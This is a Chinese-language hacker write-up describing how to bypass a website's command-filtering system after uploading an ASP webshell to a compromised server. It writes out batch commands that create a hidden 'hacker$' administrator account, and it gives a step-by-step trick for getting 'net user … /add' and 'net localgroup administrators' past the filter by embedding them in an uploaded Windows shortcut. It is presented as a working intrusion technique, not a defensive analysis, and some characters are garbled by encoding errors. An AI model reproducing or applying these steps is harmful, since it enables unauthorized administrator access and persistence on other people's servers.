主要寫的是突破提權(quán)的方法，

再次突破變態(tài)限制網(wǎng)站安全

    有突破一流信息攔截系統(tǒng)的網(wǎng)站，上傳個(gè)馬就不容易，好容易上傳了，還不能執(zhí)行命令，郁悶了..

    執(zhí)行命令提權(quán)的時(shí)候因?yàn)槊�令里�?net user 被攔截，

    我KAO，換個(gè)思路。

    運(yùn)行批命令和直接執(zhí)行命令效果是一樣的，它既然不讓執(zhí)行net命令，我運(yùn)行批命令還不行嗎？

    立刻動(dòng)手，在asp馬里點(diǎn)[新建文件] 把名字改稱hacker.bat 在內(nèi)容里寫上：

    net usernet user hacker$ /del

    net usernet user hacker$ hacker /add

    net localgroup administrators hacker$ /add

    OK。保存！

    暈！不成功！直接被攔....

    郁悶了一會(huì)，又想個(gè)辦法：在本地弄個(gè)批命令，然后上傳，這攔截系統(tǒng)總不會(huì)對(duì)文件攔截吧？

    OK。上傳！

    暈！又被攔！...

    難道這家伙真到看文件內(nèi)容？

    那它是怎么看的？

    給服務(wù)器按個(gè)OD之類的？

    不大現(xiàn)實(shí)...真正的EXE 程序想執(zhí)行命令必然不會(huì)把命令原樣保持在程序里的，

    自己寫個(gè)程序試試？

    暈！沒工具...又沒經(jīng)驗(yàn)...

    算了

    回家看電子書...1998-2002的綠盟的文章，好多..

    看到個(gè)2000系統(tǒng)輸入法漏洞入侵的文章，在文章結(jié)尾作者提出了幾個(gè)問題，后來有高手做了答，

電腦資料

    看到這幾個(gè)問題的答案，偶突然有了突破一流信息攔截系統(tǒng)執(zhí)行命令的方法..

    .

    1、準(zhǔn)備提權(quán)命令：cmd.exe /c net user hacker hacker /add & net localgroup administrators hacker /add

    2、新建快捷方式，在地址欄寫入提權(quán)命令

    3、上傳這個(gè)快捷方式

    4、在提權(quán)工具幫助下運(yùn)行這個(gè)快捷方式.....

    5、管理員添加成功....